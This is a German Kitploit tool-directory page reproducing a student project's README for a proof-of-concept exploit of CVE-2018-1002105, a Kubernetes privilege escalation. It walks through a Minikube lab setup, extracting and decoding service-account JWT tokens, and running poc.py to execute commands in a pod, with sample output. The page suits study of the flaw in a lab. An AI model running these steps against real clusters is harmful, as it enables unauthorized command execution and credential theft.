Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-1002105 — Proof-of-Concept-Exploit für CVE-2018-1002105, eine Kubernetes-Privilegieneskalationssicherheitslücke, die eine unbefugte Befehlsausführung in Pods über den kube-apiserver ermöglicht. | Kitploit
Tools/GitHubGitHub/sh-ubh/cve-2018-1002105
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsCloud-Sicherheit
GitHubsh-ubh/cve-2018-1002105

CVE-2018-1002105

Proof-of-Concept-Exploit für CVE-2018-1002105, eine Kubernetes-Privilegieneskalationssicherheitslücke, die eine unbefugte Befehlsausführung in Pods über den kube-apiserver ermöglicht.

Repository anzeigen
12vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CMPT733-Group11(0x90)

CVE-2018-1002105

Mitglieder: Abhishek Rungta, Shubham Saini, Siddhant Sood

Umgebungseinrichtung

  • Eine Linux-VM (wie Ubuntu 20.04)
  • Minikube für das lokale Deployment von Kubernetes
  • Eine dieser älteren Versionen (1.0.x–1.9.x, 1.10.0–1.10.10, 1.11.0–1.11.4, 1.12.0–1.12.2)

Ausführen des Exploits

Wir haben ein VirtualBox-Image (.ova-Datei) bereitgestellt. Laden Sie es herunter und erstellen Sie eine VM daraus. Die bereitgestellte OVA ist bereits mit Docker v18.09 und Minikube v1.9.0 konfiguriert.

OVA-Link

Bauen des Kubernetes-Clusters

Da unser virtuelles Image bereits Minikube und die erforderlichen Kubernetes-Versionen enthält, führen Sie einfach den folgenden Befehl aus, um Minikube zu starten:

root@kitploit:~
minikube start --kubernetes-version=v1.12.2

Neuen Benutzer, Namespace erstellen und Rolle zuweisen

Erstellen Sie einen neuen Benutzer und einen Namespace und weisen Sie dem erstellten Benutzer eine RBAC-Rolle mit dem folgenden Befehl zu.

root@kitploit:~
kubectl apply -f fixing_policy.yml

Zugriff auf conntract entfernen

root@kitploit:~
kubectl edit configmaps kube-proxy --namespace=kube-system

Ändern Sie den Wert von maxPerCore auf 0

JWT-Token abrufen

Führen Sie zuerst den folgenden Befehl aus, um alle im System gespeicherten JWT-Token abzurufen.

root@kitploit:~
kubectl get secrets -A

Um das Secret des erstellten Benutzers zu erhalten, führen Sie den folgenden Befehl aus:

root@kitploit:~
kubectl -n [namespace] get secrets [user-token] -o json

Dann Base64-dekodieren.

root@kitploit:~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN

IP-Adresse und Portnummer abrufen

root@kitploit:~
kubectl cluster-info

Pod bereitstellen

root@kitploit:~
kubectl run --image=nginx:alpine securenginx -n poc

POC ausführen

Geben Sie alle erforderlichen Argumente an:
-t für das Ziel > ip:port (erforderlich)
-j für das JWT-Token des Benutzers (erforderlich)
-p für den Pod (erforderlich)
-n für den Namespace
-m für die Methode (erforderlich)
-c für den Container
-x für den Angreiferbefehl

Testfall

Input

root@kitploit:~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
root@kitploit:~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 

Output

root@kitploit:~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

Video-Demo

Demo-Video Link

Tool herunterladen